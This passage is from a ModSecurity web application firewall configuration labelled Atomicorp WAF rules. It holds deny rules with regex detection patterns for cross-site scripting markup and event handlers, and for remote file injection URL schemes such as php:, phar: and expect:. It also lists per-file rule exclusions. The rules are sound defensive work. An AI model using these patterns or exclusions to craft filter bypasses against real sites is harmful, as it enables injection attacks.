RGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"

SecRule ARGS "!(^(submit\+>>|>>)$)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:350248,rev:129,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:livezillacode|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:/embed/|!ARGS:/script/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase"


SecMarker END_RULES_91760

SecRule REQUEST_FILENAME "/mt\.cgi" "phase:2,id:91761,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:91762,t:none,pass,nolog,skipAfter:END_RULES_91762"



SecRule ARGS "!(^(submit\+>>|>>)$)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:361248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/text/|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/script/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"

SecRule ARGS "!(^(submit\+>>|>>)$)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:350249,rev:129,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:livezillacode|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:/embed/|!ARGS:/script/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase"


SecMarker END_RULES_91762

SecRule REQUEST_FILENAME "/systeembeheer/" "phase:2,id:91763,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/admin/add_sighting\.php" "phase:2,id:91764,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/ticket_detail\.php" "phase:2,id:91765,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/createsite\.php" "phase:2,id:91766,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/cleanedit\.php" "phase:2,id:91767,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/zabbix/setup\.php" "phase:2,id:91768,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/upldgallery\.php" "phase:2,id:91769,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/tooltip_result\.php" "phase:2,id:91770,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/edit_orders\.php" "phase:2,id:91771,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/tableedit\.php" "phase:2,id:91772,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390621"

SecRule REQUEST_FILENAME "/admin_previewjobs\.php" "phase:2,id:91773,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/businessadd2\.php" "phase:2,id:91774,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/packages-rest\.php" "phase:2,id:91775,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:91776,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/editmessagesexec\.php" "phase:2,id:91777,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/backend\.php" "phase:2,id:91778,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/imp/redirect\.php" "phase:2,id:91779,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/edetailing_nsclc\.html" "phase:2,id:91780,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390615"

SecRule REQUEST_FILENAME "/wibstats\.php" "phase:2,id:91781,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390615"

SecRule REQUEST_FILENAME "/admincp/plugin\.php" "phase:2,id:91782,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=380023"

SecRule REQUEST_FILENAME "/maakpromotieorderb\.php" "phase:2,id:91783,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/admin/listcontent\.php" "phase:2,id:91784,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/showtable/update\.php" "phase:2,id:91785,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91786,t:none,pass,nolog,skipAfter:END_RULES_91786"

SecRule ARGS|!ARGS:q|!ARGS:guid|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:330475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:q|!ARGS:guid|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:330476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91786

SecRule REQUEST_FILENAME "/admin/locations/editphoto\.php" "phase:2,id:91787,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/translation_tool\.php" "phase:2,id:91788,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/edituserplugin\.php" "phase:2,id:91789,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/imp/mailbox\.php" "phase:2,id:91790,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390707"

